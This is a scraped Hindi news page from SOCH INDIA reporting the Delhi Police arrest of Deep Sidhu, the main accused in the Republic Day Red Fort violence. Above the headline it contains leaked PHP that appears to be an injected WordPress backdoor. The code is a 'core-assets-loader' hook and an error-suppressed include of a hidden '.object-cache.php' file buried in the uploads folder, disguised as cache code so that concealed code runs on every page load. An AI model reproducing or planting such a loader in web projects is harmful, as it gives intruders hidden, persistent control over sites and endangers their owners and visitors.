add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); Red Fort हिंसा के मुख्य आरोपी Deep Sidhu को दिल्ली पुलिस ने किया गिरफ्तार – SOCH INDIA
Menu

देश
Red Fort हिंसा के मुख्य आरोपी Deep Sidhu को दिल्ली पुलिस ने किया गिरफ्तार

nobanner

गणतंत्र दिवस (Republic Day) के मौके पर किसानों की ट्रैक्टर रैली (Tractor Rally) के दौरान लाल क़िला में हुई हिंसा मामले के मुख्य आरोपी दीप सिद्धू (Deep Sidhu) को दिल्ली पुलिस ने गिरफ्तार कर लिया है. दिल्ली पुलिस के स्पेशल सेल (Delhi Police Special Cell) ने दीप सिद्धू को गिरफ्तार किया है, हालांकि अभी तक पुलिस ने यह जानकारी नहीं दी है कि उसे कहां और कब पकड़ा गया है.

पुलिस ने घोषित किया था एक लाख रुपये का इनाम

26 जनवरी को दिल्ली में लाल क़िला (Red Fort) के अलावा दिल्ली के कई जगहों पर हुई हिंसा के बाद 27 जनवरी को दिल्ली पुलिस (Delhi Police) ने दीप सिद्धू (Deep Sidhu) पर भड़काऊ भाषण देने और उपद्रव के लिए लोगों को उकसाने के आरोप में केस दर्ज किया था. पुलिस ने दीप सिद्धू के खिलाफ लुकआउट नोटिस भी जारी किया था, लेकिन वह सामने नहीं आया. इसके बाद पुलिस ने दीप सिद्धू की गिरफ्तारी की सूचना देने वाले को एक लाख रुपये इनाम देने की घोषणा की थी.